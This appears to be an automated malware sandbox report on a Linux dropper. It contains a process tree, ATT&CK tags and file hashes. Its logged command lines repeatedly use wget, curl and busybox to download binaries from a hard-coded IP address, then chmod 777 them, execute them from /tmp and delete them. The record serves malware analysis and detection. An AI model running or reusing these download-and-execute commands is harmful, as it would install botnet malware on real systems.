/usr/bin/wgetwget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:929
-
-
/bin/chmodchmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:932
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:933
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:935
-
-
/bin/chmodchmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:938
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:939
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:941
-
-
/bin/chmodchmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:947
-
-
/bin/chmodchmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:953
-
-
/bin/chmodchmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:956
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:957
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:959
-
-
/bin/chmodchmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:962
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97